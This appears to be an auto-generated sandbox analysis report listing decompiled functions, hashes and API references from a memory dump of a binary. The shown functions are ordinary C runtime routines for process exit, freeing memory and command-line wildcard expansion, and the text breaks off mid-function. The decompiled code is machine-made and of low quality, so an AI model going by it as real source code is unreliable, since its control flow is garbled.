API String ID: 0-2837366778
Opcode ID: 4979c69c0ad183f06ea38e44a1b11ce52a037f2688d2ffed813c03059b76484a
Instruction ID: 22d661fd4da3f2ab4ce5f121b8d72eb67e6f167783baa67e8678c2a98964e41b
Opcode Fuzzy Hash: 4979c69c0ad183f06ea38e44a1b11ce52a037f2688d2ffed813c03059b76484a
Instruction Fuzzy Hash: 5121B0B1204B15BFD722AFA5CD8096B77EDEE023A97004615E854D7590E732EC608BB0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33F49B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6F33F49B(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6f348124(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6f33f4a1
0x6f33f4a5
0x6f33f4b0
0x6f33f4b8
0x6f33f4c3
0x6f33f4c9
0x6f33f4cd
0x6f33f4d4
0x6f33f4da
0x6f33f4da
0x6f33f4dc
0x6f33f4e1
0x00000000
0x6f33f4e6
0x6f33f4ef

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6F33F44D,?,?,6F33F415,?,00000001,?), ref: 6F33F4B0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F33F4C3
FreeLibrary.KERNEL32(00000000,?,?,6F33F44D,?,?,6F33F415,?,00000001,?), ref: 6F33F4E6

Strings

mscoree.dll, xrefs: 6F33F4A9
CorExitProcess, xrefs: 6F33F4BB

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ae0837b93c65aec1b4aca3e5e8a33e7fcf36249ce177917b1448b7fcc6fd7c6f
Instruction ID: bffe762251cb2e5a0fd3d5a6df4beb53f70164436fa7de4ff685f18b5addebf8
Opcode Fuzzy Hash: ae0837b93c65aec1b4aca3e5e8a33e7fcf36249ce177917b1448b7fcc6fd7c6f
Instruction Fuzzy Hash: B2F05832915A28FBDB11ABA0C909BAE7ABDEF05726F014069F904A2190CB718E14DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F344706, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F344706(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6f366790; // 0x6f3667e0
					if(_t23 != 0) {
						E6F33FEFF(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6f366794; // 0x6f37e7e8
					if(_t24 != 0) {
						E6F33FEFF(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6f366798; // 0x6f37e7e8
					if(_t25 != 0) {
						E6F33FEFF(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6f3667c0; // 0x6f3667e4
					if(_t26 != 0) {
						E6F33FEFF(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6f3667c4; // 0x6f37e7ec
					if(_t27 != 0) {
						return E6F33FEFF(_t6);
					}
				}
				return _t6;
			}

0x6f34470c
0x6f344711
0x6f344715
0x6f34471b
0x6f34471e
0x6f344723
0x6f344727
0x6f34472d
0x6f344730
0x6f344735
0x6f344739
0x6f34473f
0x6f344742
0x6f344747
0x6f34474b
0x6f344751
0x6f344754
0x6f344759
0x6f34475a
0x6f34475d
0x6f344763
0x00000000
0x6f34476b
0x6f344763
0x6f34476e

APIs

_free.LIBCMT ref: 6F34471E

Part of subcall function 6F33FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F344730
_free.LIBCMT ref: 6F344742
_free.LIBCMT ref: 6F344754
_free.LIBCMT ref: 6F344766

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e9ba68660b61c0d6d920641d2929c12c0464092a119c4dced2f5af12e2e3cab9
Instruction ID: 67b91356cb007254b582a22fdf147a33c3b8c8129f3a13cb77035d14ac5c7b4d
Opcode Fuzzy Hash: e9ba68660b61c0d6d920641d2929c12c0464092a119c4dced2f5af12e2e3cab9
Instruction Fuzzy Hash: 97F09C32904754DB8514DF68D1C1C5F3BDDFB837A07611A1AF469DB940CB31F8404694

Uniqueness

Uniqueness Score: -1.00%

Function 6F341699, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6F341699(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				_t320 = _t131;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E6F33F7DC(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6F344A43(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E6F3400F7();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E6F3401B7(_t242, _t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E6F344A43(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E6F341C8B(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6F33FEFF(_t302);
														_t305 = _v12;
													}
													E6F33FEFF(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E6F344A43(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6F3400F7();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0x6f36609c; // 0xe80c9ffe
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E6F344A90(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E6F34167A(_t245 - _t289 + 1, _t289,  &_v676, E6F341B96(_t279, __eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E6F3415AB( &(_v608.cFileName),  &_v640,  &_v609, E6F341B96(_t279, __eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E6F33FEFF(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E6F33FEFF(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E6F33EB90(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E6F3414E1);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E6F33FEFF(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E6F33C65E(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E6F33FEFF(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E6F344A50(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E6F33FEFF( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E6F33FEFF(_t285);
						goto L31;
					}
				} else {
					_t220 = E6F3401A4(_t320);
					_t299 = 0x16;
					 *_t220 = _t299;
					E6F3400E7();
					L31:
					return _t299;
				}
				L81:
			}

0x6f34169e
0x6f3416a1
0x6f3416a5
0x6f3416a7
0x6f3416bd
0x6f3416c1
0x6f3416c4
0x6f3416c6
0x6f3416c8
0x6f3416ca
0x6f3416cc
0x6f3416cf
0x6f3416d2
0x6f3416d5
0x6f3416d7
0x6f34173a
0x6f34173c
0x6f34173f
0x6f341741
0x6f341745
0x6f34174e
0x6f34174f
0x6f341752
0x6f341754
0x6f341757
0x6f34175b
0x6f34175b
0x6f34175d
0x6f34175f
0x6f341761
0x6f341763
0x6f341763
0x6f341765
0x6f341768
0x6f34176b
0x6f34176b
0x6f34176d
0x6f34176e
0x6f34176e
0x6f341779
0x6f34177b
0x6f34177e
0x6f34177f
0x6f341782
0x6f341782
0x6f341786
0x6f341789
0x6f34178c
0x6f34178c
0x6f34178c
0x6f341799
0x6f34179b
0x6f34179e
0x6f3417a0
0x6f3417b8
0x6f3417bb
0x6f3417be
0x6f3417c0
0x6f3417c3
0x6f3417c5
0x6f3417c8
0x6f3417cb
0x6f341828
0x6f34182b
0x6f34182e
0x6f341830
0x00000000
0x6f3417cd
0x6f3417cf
0x6f3417cf
0x6f3417d1
0x6f3417d4
0x6f3417d4
0x6f3417d6
0x6f3417d8
0x6f3417de
0x6f3417e1
0x6f3417e1
0x6f3417e3
0x6f3417e4
0x6f3417e4
0x6f3417eb
0x6f3417ee
0x6f3417f2
0x6f3417ff
0x6f341804
0x6f341807
0x6f341809
0x6f34187f
0x6f341880
0x6f341881
0x6f341882
0x6f341883
0x6f341884
0x6f341889
0x6f34188d
0x6f34188f
0x6f341890
0x6f341893
0x6f341893
0x6f341896
0x6f341896
0x6f341898
0x6f341899
0x6f341899
0x6f34189d
0x6f34189e
0x6f3418a5
0x6f3418a8
0x6f3418ab
0x6f3418ad
0x6f3418b7
0x6f3418b8
0x6f3418b9
0x6f3418bc
0x6f3418c6
0x6f3418ca
0x6f3418cc
0x6f3418e0
0x6f3418e0
0x6f3418e3
0x6f3418ed
0x6f3418f2
0x6f3418f5
0x6f3418f7
0x00000000
0x6f3418f9
0x6f3418f9
0x6f3418fe
0x6f341905
0x6f341908
0x6f34190a
0x6f34191b
0x6f34191d
0x6f34191f
0x6f34191f
0x6f34191f
0x6f34190c
0x6f34190d
0x6f341912
0x6f341915
0x6f341924
0x6f34192a
0x00000000
0x6f34192d
0x6f3418ce
0x6f3418ce
0x6f3418d4
0x6f3418d9
0x6f3418dc
0x6f3418de
0x6f341930
0x6f341932
0x6f341933
0x6f341934
0x6f341935
0x6f341936
0x6f341937
0x6f34193c
0x6f34193f
0x6f341940
0x6f341942
0x6f341948
0x6f34194f
0x6f341952
0x6f341955
0x6f341958
0x6f341959
0x6f34195a
0x6f34195d
0x6f341963
0x6f341965
0x6f341967
0x6f341967
0x6f341969
0x6f34196b
0x00000000
0x00000000
0x6f34196d
0x6f34196f
0x6f341971
0x6f341973
0x6f34197e
0x6f341980
0x6f341982
0x00000000
0x00000000
0x6f341982
0x6f341973
0x00000000
0x6f34196f
0x6f341984
0x6f341984
0x6f34198a
0x6f34198c
0x6f341992
0x6f341994
0x6f3419b6
0x6f3419b6
0x6f3419b8
0x6f3419ba
0x6f3419c6
0x6f3419c6
0x6f3419bc
0x6f3419bc
0x6f3419be
0x00000000
0x6f3419c0
0x6f3419c0
0x6f3419c2
0x6f3419c4
0x00000000
0x00000000
0x6f3419c4
0x6f3419be
0x6f3419ce
0x6f3419d6
0x6f3419dc
0x6f3419dd
0x6f3419df
0x6f3419e7
0x6f3419ed
0x6f3419f3
0x6f3419f9
0x6f341a0d
0x6f341a12
0x6f341a1d
0x6f341a2d
0x6f341a33
0x6f341a35
0x6f341a38
0x6f341a5b
0x6f341a5b
0x6f341a60
0x6f341a66
0x6f341a66
0x6f341a6c
0x6f341a72
0x6f341a78
0x6f341a7e
0x6f341a84
0x6f341aa5
0x6f341aaa
0x6f341aaf
0x6f341ab3
0x6f341ab9
0x6f341abc
0x6f341acf
0x6f341acf
0x6f341ad5
0x6f341adb
0x6f341adc
0x6f341add
0x6f341ae2
0x6f341ae5
0x6f341aeb
0x6f341aed
0x6f341b4b
0x6f341b51
0x6f341b59
0x6f341b5e
0x6f341b64
0x6f341b65
0x00000000
0x00000000
0x00000000
0x6f341abe
0x6f341abe
0x6f341ac1
0x6f341ac3
0x00000000
0x6f341ac5
0x6f341ac5
0x6f341ac8
0x00000000
0x6f341aca
0x6f341aca
0x6f341acd
0x00000000
0x00000000
0x00000000
0x00000000
0x6f341acd
0x6f341ac8
0x6f341ac3
0x6f341b67
0x6f341b68
0x00000000
0x6f341aef
0x6f341aef
0x6f341af5
0x6f341afd
0x6f341b02
0x6f341b11
0x6f341b11
0x6f341b19
0x6f341b1f
0x6f341b25
0x6f341b2c
0x6f341b2f
0x6f341b31
0x6f341b41
0x6f341b46
0x00000000
0x6f341a3a
0x6f341a3a
0x6f341a40
0x6f341a41
0x6f341a42
0x6f341a43
0x6f341a4b
0x6f341a4b
0x6f341b6e
0x6f341b6e
0x6f341b76
0x6f341b7e
0x6f341b83
0x6f341996
0x6f341999
0x6f34199b
0x6f3419b0
0x00000000
0x6f34199d
0x6f34199d
0x6f3419a0
0x6f3419a1
0x6f3419a2
0x6f3419a3
0x6f3419a8
0x6f34199b
0x6f341b8a
0x6f341b95
0x00000000
0x00000000
0x00000000
0x6f3418de
0x6f3418af
0x6f3418b1
0x6f3418b2
0x6f3418b6
0x6f3418b6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f34180b
0x6f34180b
0x6f341811
0x6f341814
0x6f341817
0x6f34181a
0x6f34181d
0x6f341820
0x6f341823
0x6f341823
0x00000000
0x6f3417d4
0x6f3417a2
0x6f3417a2
0x6f3417a5
0x6f341832
0x6f341833
0x6f341838
0x00000000
0x6f341838
0x6f3416d9
0x6f3416d9
0x6f3416dc
0x6f3416e4
0x6f3416e7
0x6f3416ee
0x6f3416f0
0x6f3416f2
0x6f34170d
0x6f34170e
0x6f34170f
0x6f341710
0x6f341715
0x6f341718
0x6f34171b
0x6f3416f4
0x6f3416f4
0x6f3416f7
0x6f3416f8
0x6f3416f9
0x6f3416fa
0x6f3416fb
0x6f341700
0x6f341702
0x6f341705
0x6f341705
0x6f34171d
0x6f34171f
0x00000000
0x00000000
0x6f341728
0x6f34172b
0x6f34172e
0x6f341730
0x6f341732
0x00000000
0x6f341734
0x6f341734
0x6f341737
0x00000000
0x6f341737
0x00000000
0x6f341732
0x6f3417ad
0x6f341839
0x6f34183c
0x6f341840
0x6f341849
0x6f34184c
0x6f341850
0x6f341850
0x6f341852
0x6f341855
0x6f341857
0x6f341859
0x6f34185b
0x6f341860
0x6f341861
0x6f341865
0x6f341865
0x6f341869
0x6f34186c
0x6f34186c
0x6f341870
0x00000000
0x6f341877
0x6f3416a9
0x6f3416a9
0x6f3416b0
0x6f3416b1
0x6f3416b3
0x6f341878
0x6f34187e
0x6f34187e
0x00000000

APIs

_free.LIBCMT ref: 6F341833

Strings

*?, xrefs: 6F3416DC

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 8c8d511e6ea196100512c12a7ea46039141ace5b87392d3855a92573c06a66c9
Instruction ID: c7a9a356c1010f4f9ca6d0d04a7f09b527bf74e8d69ffc92358782bbf26be8ed
Opcode Fuzzy Hash: 8c8d511e6ea196100512c12a7ea46039141ace5b87392d3855a92573c06a66c9
Instruction Fuzzy Hash: 47616DB6E006199FDB15DFA9C8805EEFBF5EF48314B24826AD854F7340D731AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F33F52B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6F33F52B(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E6F3423D2(_t48, _t59);
						E6F341E1F(_t57, 0, 0x6f37e218, 0x104);
						_t26 =  *0x6f37e7c0; // 0xe83470
						 *0x6f37e7b0 = 0x6f37e218;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6f37e218;
							_v20 = 0x6f37e218;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6F33F7DC(E6F33F663( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6F33F663( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6F341D12(_t48, 0, _t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
